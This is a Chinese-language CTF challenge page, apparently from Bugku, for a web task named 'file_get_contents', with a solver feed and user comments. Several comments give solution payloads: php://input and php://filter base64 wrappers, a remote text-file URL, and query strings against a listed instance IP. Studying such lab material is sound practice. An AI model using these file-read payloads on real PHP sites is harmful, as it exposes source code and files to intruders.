file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
4109
提 示:
描 述:
file_get_contents????
评分(6)
解题动态
17361232956 攻破了该题 2小时前
liqliq 攻破了该题 7小时前
932041046 攻破了该题 12小时前
2970507147 攻破了该题 14小时前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
walkerming 攻破了该题 1天前
2757547892 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
malx 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
weiyouzhunze 攻破了该题 2天前
1234567nxb 攻破了该题 3天前
waiming 攻破了该题 3天前
lin666 攻破了该题 3天前
泡泡鱼 攻破了该题 4天前
huangyujie 攻破了该题 4天前
爱吃馒头 攻破了该题 4天前
jiumei 攻破了该题 4天前
评论
落日星辰 3年前
举报
?ac=bugku&fn=flag.txt
夜雨 3年前
举报
向自己网站构造一个文本文件。只要内容和ac对应就行了 比如我的就是 /?ac=test&fn=https://yeyusmile.top/upload/test.txt
我赌你的枪里没有子弹 3年前
举报
index.php就能读取到,不用自己构造。
最爱吃兽奶 3年前
举报
方法1:http://114.67.175.224:10746/?ac=bugku&fn=flag.txt 方法2:http://114.67.175.224:10746/?ac=flag&fn=php://input,burp数据包里面加句flag就行 不蟹
我赌你的枪里没有子弹 3年前
举报
方法2:?fn=php://filter/read=convert.base64-encode/resource=index.php&ac=[index.php base64编码]
xiaosi429 3年前
举报
dirsearch
树木有点绿 3年前
举报
学到了
白猫a 2年前
举报
看到树神了
Z5bra 4年前
举报
补了下数据流和I/O模型,好题
陈江川0118 4年前
举报
以后做题看到file_get_contents函数就应该想到php://input协议
ximing 4年前
举报
主要考察 file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/
2817001550 4年前
举报
这题应该考察的是file_get_contents的文件包含漏洞,使用php伪协议php://input作为file_get_contents的参数,让该函数获得POST的上传的数据,然后再构造url设置ac参数的值和http主体部分相同就可
_mengcehn 4年前
举报
file_get_contents()能绕过